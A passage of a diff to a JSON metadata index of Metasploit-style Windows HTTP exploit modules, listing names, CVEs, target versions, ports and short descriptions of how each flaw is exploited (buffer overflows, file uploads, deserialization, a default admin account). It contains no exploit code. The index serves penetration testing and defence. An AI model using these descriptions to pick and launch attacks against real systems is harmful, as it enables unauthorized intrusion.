The module will check for an exploitable build.", + "references": [ + "CVE-2021-44077", + "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above", + "URL-https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021", + "URL-https://www.cisa.gov/uscert/ncas/alerts/aa21-336a", + "URL-https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", + "URL-https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis", + "URL-https://xz.aliyun.com/t/10631" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Dropper" + ], + "mod_time": "2021-12-09 17:27:35 +0000", + "path": "/modules/exploits/windows/http/manageengine_servicedesk_plus_cve_2021_44077.rb", + "is_install_path": true, + "ref_name": "windows/http/manageengine_servicedesk_plus_cve_2021_44077", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/maxdb_webdbm_database": { + "name": "MaxDB WebDBM Database Parameter Overflow", + "fullname": "exploit/windows/http/maxdb_webdbm_database", + "aliases": [], + "rank": 400, + "disclosure_date": "2006-08-29", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. By sending a specially-crafted HTTP request that contains\n an overly long database name. 
A remote attacker could overflow a buffer\n and execute arbitrary code on the system with privileges of the wahttp process.\n\n This module has been tested against MaxDB 7.6.00.16 and MaxDB 7.6.00.27.", + "references": [ + "CVE-2006-4305", + "OSVDB-28300", + "BID-19660" + ], + "platform": "Windows", + "arch": "", + "rport": 9999, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "MaxDB 7.6.00.16", + "MaxDB 7.6.00.27" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/maxdb_webdbm_database.rb", + "is_install_path": true, + "ref_name": "windows/http/maxdb_webdbm_database", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/maxdb_webdbm_get_overflow": { + "name": "MaxDB WebDBM GET Buffer Overflow", + "fullname": "exploit/windows/http/maxdb_webdbm_get_overflow", + "aliases": [], + "rank": 400, + "disclosure_date": "2005-04-26", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in the MaxDB WebDBM\n service. This service is included with many recent versions\n of the MaxDB and SAPDB products. This particular module is\n capable of exploiting Windows systems through the use of an\n SEH frame overwrite. 
The offset to the SEH frame may change\n depending on where MaxDB has been installed, this module\n assumes a web root path with the same length as:\n\n C:\\Program Files\\sdb\\programs\\web\\Documents", + "references": [ + "CVE-2005-0684", + "OSVDB-15816", + "URL-http://www.idefense.com/application/poi/display?id=234&type=vulnerabilities", + "BID-13368" + ], + "platform": "Windows", + "arch": "", + "rport": 9999, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "MaxDB 7.5.00.11 / 7.5.00.24", + "Windows 2000 English", + "Windows XP English SP0/SP1", + "Windows 2003 English", + "Windows NT 4.0 SP4/SP5/SP6" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/maxdb_webdbm_get_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/mcafee_epolicy_source": { + "name": "McAfee ePolicy Orchestrator / ProtectionPilot Overflow", + "fullname": "exploit/windows/http/mcafee_epolicy_source", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-07-17", + "type": "exploit", + "author": [ + "muts ", + "xbxice ", + "hdm ", + "aushack " + ], + "description": "This is an exploit for the McAfee HTTP Server (NAISERV.exe).\n McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are\n known to be vulnerable. By sending a large 'Source' header, the stack can\n be overwritten. 
This module is based on the exploit by xbxice and muts.\n Due to size constraints, this module uses the Egghunter technique.", + "references": [ + "CVE-2006-5156", + "OSVDB-29421", + "EDB-2467", + "BID-20288" + ], + "platform": "Windows", + "arch": "x86", + "rport": 81, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "ePo 2.5.1 (Service Pack 1)", + "ePo 3.5.0/ProtectionPilot 1.1.0" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/mcafee_epolicy_source.rb", + "is_install_path": true, + "ref_name": "windows/http/mcafee_epolicy_source", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/mdaemon_worldclient_form2raw": { + "name": "MDaemon WorldClient form2raw.cgi Stack Buffer Overflow", + "fullname": "exploit/windows/http/mdaemon_worldclient_form2raw", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-12-29", + "type": "exploit", + "author": [ + "aushack " + ], + "description": "This module exploits a stack buffer overflow in Alt-N MDaemon SMTP server for\n versions 6.8.5 and earlier. When WorldClient HTTP server is installed (default),\n a CGI script is provided to accept html FORM based emails and deliver via MDaemon.exe,\n by writing the CGI output to the Raw Queue. When X-FromCheck is enabled (also default),\n the temporary form2raw.cgi data is copied by MDaemon.exe and a stack based\n overflow occurs when an excessively long From field is specified.\n The RawQueue is processed every 1 minute by default, to a maximum of 60 minutes.\n Keep this in mind when choosing payloads or setting WfsDelay... You'll need to wait.\n\n Furthermore, this exploit uses a direct memory jump into a nopsled (which isn't very\n reliable). 
Once the payload is written into the Raw Queue by Form2Raw, MDaemon will\n continue to crash/execute the payload until the CGI output is manually deleted\n from the queue in C:\\MDaemon\\RawFiles\\*.raw.", + "references": [ + "CVE-2003-1200", + "OSVDB-3255", + "BID-9317" + ], + "platform": "Windows", + "arch": "x86", + "rport": 3000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Universal MDaemon.exe", + "Debugging test" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb", + "is_install_path": true, + "ref_name": "windows/http/mdaemon_worldclient_form2raw", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/minishare_get_overflow": { + "name": "Minishare 1.4.1 Buffer Overflow", + "fullname": "exploit/windows/http/minishare_get_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2004-11-07", + "type": "exploit", + "author": [ + "acaro " + ], + "description": "This is a simple buffer overflow for the minishare web\n server. This flaw affects all versions prior to 1.4.2. This\n is a plain stack buffer overflow that requires a \"jmp esp\" to reach\n the payload, making this difficult to target many platforms\n at once. This module has been successfully tested against\n 1.4.1. 
Version 1.3.4 and below do not seem to be vulnerable.", + "references": [ + "CVE-2004-2271", + "OSVDB-11530", + "BID-11620", + "URL-http://archives.neohapsis.com/archives/fulldisclosure/2004-11/0208.html" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic", + "Windows 2000 SP0-SP3 English", + "Windows 2000 SP4 English", + "Windows XP SP0-SP1 English", + "Windows XP SP2 English", + "Windows 2003 SP0 English", + "Windows 2003 SP1 English", + "Windows 2003 SP2 English", + "Windows NT 4.0 SP6", + "Windows XP SP2 German", + "Windows XP SP2 Polish", + "Windows XP SP2 French", + "Windows XP SP3 French" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/minishare_get_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/minishare_get_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/miniweb_upload_wbem": { + "name": "MiniWeb (Build 300) Arbitrary File Upload", + "fullname": "exploit/windows/http/miniweb_upload_wbem", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-04-09", + "type": "exploit", + "author": [ + "AkaStep", + "bcoles " + ], + "description": "This module exploits a vulnerability in MiniWeb HTTP server (build 300).\n The software contains a file upload vulnerability that allows an\n unauthenticated remote attacker to write arbitrary files to the file system.\n\n Code execution can be achieved by first uploading the payload to the remote\n machine as an exe file, and then upload another mof file, which enables\n WMI (Management Instrumentation service) to execute the uploaded payload.\n Please note that this module currently only works for Windows before Vista.", + "references": [ + 
"OSVDB-92198", + "OSVDB-92200", + "PACKETSTORM-121168" + ], + "platform": "Windows", + "arch": "", + "rport": 8000, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "MiniWeb build 300 on Windows (Before Vista)" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/miniweb_upload_wbem.rb", + "is_install_path": true, + "ref_name": "windows/http/miniweb_upload_wbem", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/moveit_cve_2023_34362": { + "name": "MOVEit SQL Injection vulnerability", + "fullname": "exploit/windows/http/moveit_cve_2023_34362", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-05-31", + "type": "exploit", + "author": [ + "sfewer-r7", + "rbowes-r7", + "bwatters-r7" + ], + "description": "This module exploits an SQL injection vulnerability in the MOVEit Transfer web application\n that allows an unauthenticated attacker to gain access to MOVEit Transfer’s database.\n Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an\n attacker can leverage an information leak be able to upload a .NET deserialization payload.", + "references": [ + "CVE-2023-34362", + "URL-https://github.com/sfewer-r7/CVE-2023-34362", + "URL-https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis", + "URL-https://www.wiz.io/blog/cve-2023-34362" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command" + ], + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/exploits/windows/http/moveit_cve_2023_34362.rb", + "is_install_path": true, + "ref_name": 
"windows/http/moveit_cve_2023_34362", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/navicopa_get_overflow": { + "name": "NaviCOPA 2.0.1 URL Handling Buffer Overflow", + "fullname": "exploit/windows/http/navicopa_get_overflow", + "aliases": [], + "rank": 500, + "disclosure_date": "2006-09-28", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in NaviCOPA 2.0.1.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.", + "references": [ + "CVE-2006-5112", + "OSVDB-29257", + "BID-20250" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "NaviCOPA 2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/navicopa_get_overflow.rb", + "is_install_path": true, + "ref_name": "windows/http/navicopa_get_overflow", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/netdecision_http_bof": { + "name": "NetDecision 4.5.1 HTTP Server Buffer Overflow", + "fullname": "exploit/windows/http/netdecision_http_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2012-02-24", + "type": "exploit", + "author": [ + "Prabhu S Angadi", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in NetDecision's HTTP service\n (located in C:\\Program Files\\NetDecision\\Bin\\HttpSvr.exe). By supplying a\n long string of data to the URL, an overflow may occur if the data gets handled\n by HTTP Server's active window. 
In other words, in order to gain remote code\n execution, the victim is probably looking at HttpSvr's window.", + "references": [ + "CVE-2012-1465", + "OSVDB-79651", + "URL-http://web.archive.org/web/20121024124508/http://secunia.com/advisories/48168/", + "URL-http://secpod.org/advisories/SecPod_Netmechanica_NetDecision_HTTP_Server_DoS_Vuln.txt" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "NetDecision 4.5.1 on XP SP3" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/http/netdecision_http_bof.rb", + "is_install_path": true, + "ref_name": "windows/http/netdecision_http_bof", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/netgear_nms_rce": { + "name": "NETGEAR ProSafe Network Management System 300 Arbitrary File Upload", + "fullname": "exploit/windows/http/netgear_nms_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2016-02-04", + "type": "exploit", + "author": [ + "Ege BALCI ", + "Pedro Ribeiro " + ], + "description": "Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems.\n The application has multiple vulnerabilities that can allow an unauthenticated remote\n attacker to execute code as SYSTEM user. 
Vulnerabilities include authentication bypass,\n SQL injection, arbitrary file upload, and privilege escalation across various versions.\n This module is able to spawn a meterpreter session by chaining together two specific\n vulnerabilities inside the FileUploadController and MyHandlerInterceptor classes.\n This module has been tested with versions 1.5.0.2, 1.4.0.17, 1.1.0.13, 1.7.0.12, and 1.7.0.1.", + "references": [ + "ZDI-23-920", + "ZDI-23-918", + "CVE-2023-38096", + "CVE-2023-38098", + "CVE-2016-1525", + "US-CERT-VU-777024", + "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt", + "URL-https://seclists.org/fulldisclosure/2016/Feb/30", + "URL-https://kb.netgear.com/000065707/Security-Advisory-for-Multiple-Vulnerabilities-on-the-ProSAFE-Network-Management-System-PSV-2023-0024-PSV-2023-0025" + ], + "platform": "Windows", + "arch": "x86, x64", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "NETGEAR ProSafe Network Management System 300 / Windows" + ], + "mod_time": "2023-08-02 18:03:57 +0000", + "path": "/modules/exploits/windows/http/netgear_nms_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/netgear_nms_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/netmotion_mobility_mvcutil_deserialization": { + "name": "NetMotion Mobility Server MvcUtil Java Deserialization", + "fullname": "exploit/windows/http/netmotion_mobility_mvcutil_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2021-02-08", + "type": "exploit", + "author": [ + "mr_me", + "wvu " + ], + "description": "This module exploits an 
unauthenticated Java deserialization in the\n NetMotion Mobility server's MvcUtil.valueStringToObject() method, as\n invoked through the /mobility/Menu/isLoggedOn endpoint, to execute\n code as the SYSTEM account.\n\n Mobility server versions 11.x before 11.73 and 12.x before 12.02 are\n vulnerable. Tested against 12.01.09045 on Windows Server 2016.", + "references": [ + "CVE-2021-26914", + "URL-https://ssd-disclosure.com/ssd-advisory-netmotion-mobility-server-multiple-deserialization-of-untrusted-data-lead-to-rce/", + "URL-https://www.netmotionsoftware.com/security-advisories/security-vulnerability-in-mobility-web-server-november-19-2020", + "URL-https://srcincite.io/advisories/src-2021-0007/" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Command", + "Windows Dropper", + "PowerShell Stager" + ], + "mod_time": "2021-07-08 21:26:35 +0000", + "path": "/modules/exploits/windows/http/netmotion_mobility_mvcutil_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/http/netmotion_mobility_mvcutil_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/northstar_c2_xss_to_agent_rce": { + "name": "NorthStar C2 XSS to Agent RCE", + "fullname": "exploit/windows/http/northstar_c2_xss_to_agent_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2024-03-12", + "type": "exploit", + "author": [ + "h00die", + "chebuya" + ], + "description": "NorthStar C2, prior to commit 7674a44 on March 11 2024, contains a vulnerability where the logs page is\n vulnerable to a stored xss.\n An 
unauthenticated user can simulate an agent registration to cause the XSS and take over a users session.\n With this access, it is then possible to run a new payload on all of the NorthStar C2 compromised hosts\n (agents), and kill the original agent.\n\n Successfully tested against NorthStar C2 commit e7fdce148b6a81516e8aa5e5e037acd082611f73 running on\n Ubuntu 22.04. The agent was running on Windows 10 19045.", + "references": [ + "URL-https://blog.chebuya.com/posts/discovering-cve-2024-28741-remote-code-execution-on-northstar-c2-agents-via-pre-auth-stored-xss/", + "URL-https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc", + "URL-https://github.com/EnginDemirbilek/NorthStarC2/commit/7674a4457fca83058a157c03aa7bccd02f4a213c", + "CVE-2024-28741" + ], + "platform": "Windows", + "arch": "cmd", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Automatic Target" + ], + "mod_time": "2024-04-24 16:54:58 +0000", + "path": "/modules/exploits/windows/http/northstar_c2_xss_to_agent_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/northstar_c2_xss_to_agent_rce", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "event-dependent" + ], + "SideEffects": [ + "ioc-in-logs", + "artifacts-on-disk" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/novell_imanager_upload": { + "name": "Novell iManager getMultiPartParameters Arbitrary File Upload", + "fullname": "exploit/windows/http/novell_imanager_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-10-01", + "type": "exploit", + "author": [ + "jduck " + ], + "description": "This module exploits a directory traversal vulnerability which\n allows remote attackers to upload and execute arbitrary code.\n\n PortalModuleInstallManager", + 
"references": [ + "OSVDB-68320", + "ZDI-10-190", + "URL-http://www.novell.com/support/viewContent.do?externalId=7006515&sliceId=2" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Universal Windows Target" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/novell_imanager_upload.rb", + "is_install_path": true, + "ref_name": "windows/http/novell_imanager_upload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/novell_mdm_lfi": { + "name": "Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability", + "fullname": "exploit/windows/http/novell_mdm_lfi", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-03-13", + "type": "exploit", + "author": [ + "steponequit", + "Andrea Micalizzi (aka rgod)" + ], + "description": "This module exercises a vulnerability in Novel Zenworks Mobile Management's Mobile Device Management component\n which can allow unauthenticated remote code execution. 
Due to a flaw in the MDM.php script's input validation,\n remote attackers can both upload and execute code via a directory traversal flaw exposed in the 'language'\n parameter of a POST call to DUSAP.php.", + "references": [ + "CVE-2013-1081", + "OSVDB-91119", + "ZDI-13-087", + "URL-http://www.novell.com/support/kb/doc.php?id=7011895" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Novell Zenworks Mobile Device Management on Windows" + ], + "mod_time": "2017-07-24 06:26:21 +0000", + "path": "/modules/exploits/windows/http/novell_mdm_lfi.rb", + "is_install_path": true, + "ref_name": "windows/http/novell_mdm_lfi", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/novell_messenger_acceptlang": { + "name": "Novell Messenger Server 2.0 Accept-Language Overflow", + "fullname": "exploit/windows/http/novell_messenger_acceptlang", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-04-13", + "type": "exploit", + "author": [ + "hdm " + ], + "description": "This module exploits a stack buffer overflow in Novell GroupWise\n Messenger Server v2.0. This flaw is triggered by any HTTP\n request with an Accept-Language header greater than 16 bytes.\n To overwrite the return address on the stack, we must first\n pass a memcpy() operation that uses pointers we supply. 
Due to the\n large list of restricted characters and the limitations of the current\n encoder modules, very few payloads are usable.", + "references": [ + "CVE-2006-0992", + "OSVDB-24617", + "BID-17503" + ], + "platform": "Windows", + "arch": "", + "rport": 8300, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Groupwise Messenger DClient.dll v10510.37" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/novell_messenger_acceptlang.rb", + "is_install_path": true, + "ref_name": "windows/http/novell_messenger_acceptlang", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/nowsms": { + "name": "Now SMS/MMS Gateway Buffer Overflow", + "fullname": "exploit/windows/http/nowsms", + "aliases": [], + "rank": 400, + "disclosure_date": "2008-02-19", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Now SMS/MMS Gateway v2007.06.27.\n By sending a specially crafted GET request, an attacker may be able to execute\n arbitrary code.", + "references": [ + "CVE-2008-0871", + "OSVDB-42953", + "BID-27896" + ], + "platform": "Windows", + "arch": "", + "rport": 8800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Now SMS/MMS Gateway v2007.06.27" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/nowsms.rb", + "is_install_path": true, + "ref_name": "windows/http/nowsms", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/nscp_authenticated_rce": { + "name": "NSClient++ 0.5.2.35 - ExternalScripts Authenticated Remote Code Execution", + "fullname": 
"exploit/windows/http/nscp_authenticated_rce", + "aliases": [], + "rank": 600, + "disclosure_date": "2020-10-20", + "type": "exploit", + "author": [ + "kindredsec", + "Yann Castel (yann.castel " + ], + "description": "This module allows an attacker with knowledge of the admin password of NSClient++\n to start a privilege shell.\n For this module to work, both web interface of NSClient++ and `ExternalScripts` feature\n should be enabled.", + "references": [ + "EDB-48360" + ], + "platform": "Windows", + "arch": "x64", + "rport": 8443, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows" + ], + "mod_time": "2021-08-27 17:15:33 +0000", + "path": "/modules/exploits/windows/http/nscp_authenticated_rce.rb", + "is_install_path": true, + "ref_name": "windows/http/nscp_authenticated_rce", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oats_weblogic_console": { + "name": "Oracle Application Testing Suite WebLogic Server Administration Console War Deployment", + "fullname": "exploit/windows/http/oats_weblogic_console", + "aliases": [], + "rank": 600, + "disclosure_date": "2019-03-13", + "type": "exploit", + "author": [ + "Steven Seeley", + "sinn3r " + ], + "description": "This module abuses a feature in WebLogic Server's Administration Console to install\n a malicious Java application in order to gain remote code execution. 
Authentication\n is required, however by default, Oracle ships with a \"oats\" account that you could\n log in with, which grants you administrator access.", + "references": [], + "platform": "Java", + "arch": "java", + "rport": 8088, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "WebLogic Server Administration Console 12 or prior" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oats_weblogic_console.rb", + "is_install_path": true, + "ref_name": "windows/http/oats_weblogic_console", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": { + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [ + "repeatable-session" + ], + "Stability": [ + "crash-safe" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/octopusdeploy_deploy": { + "name": "Octopus Deploy Authenticated Code Execution", + "fullname": "exploit/windows/http/octopusdeploy_deploy", + "aliases": [], + "rank": 600, + "disclosure_date": "2017-05-15", + "type": "exploit", + "author": [ + "James Otten " + ], + "description": "This module can be used to execute a payload on an Octopus Deploy server given\n valid credentials or an API key. 
The payload is executed as a powershell script step\n on the Octopus Deploy server during a deployment.", + "references": [ + "URL-https://octopus.com" + ], + "platform": "Windows", + "arch": "", + "rport": 80, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows Powershell" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/http/octopusdeploy_deploy.rb", + "is_install_path": true, + "ref_name": "windows/http/octopusdeploy_deploy", + "check": true, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oracle9i_xdb_pass": { + "name": "Oracle 9i XDB HTTP PASS Overflow (win32)", + "fullname": "exploit/windows/http/oracle9i_xdb_pass", + "aliases": [], + "rank": 500, + "disclosure_date": "2003-08-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in the authorization\n code of the Oracle 9i HTTP XDB service. 
David Litchfield,\n has illustrated multiple vulnerabilities in the Oracle\n 9i XML Database (XDB), during a seminar on \"Variations\n in exploit methods between Linux and Windows\" presented\n at the Blackhat conference.", + "references": [ + "CVE-2003-0727", + "OSVDB-2449", + "BID-8375", + "URL-http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 8080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Oracle 9.2.0.1 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle9i_xdb_pass.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle9i_xdb_pass", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/http/oracle_beehive_evaluation": { + "name": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability", + "fullname": "exploit/windows/http/oracle_beehive_evaluation", + "aliases": [], + "rank": 600, + "disclosure_date": "2010-06-09", + "type": "exploit", + "author": [ + "1c239c43f521145fa8385d64a9c32243", + "mr_me ", + "sinn3r " + ], + "description": "This module exploits a vulnerability found in Oracle BeeHive. 
The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.", + "references": [ + "CVE-2010-4417", + "ZDI-11-020", + "URL-http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html" + ], + "platform": "Windows", + "arch": "", + "rport": 7777, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Oracle Beehive 2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/http/oracle_beehive_evaluation.rb", + "is_install_path": true, + "ref_name": "windows/http/oracle_beehive_evaluation", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/http/oracle_beehive_prepareaudiotoplay": { + "name": "Oracle BeeHive 2 voice-servlet prepareAudioToPlay() Arbitrary File Upload", + "fullname": 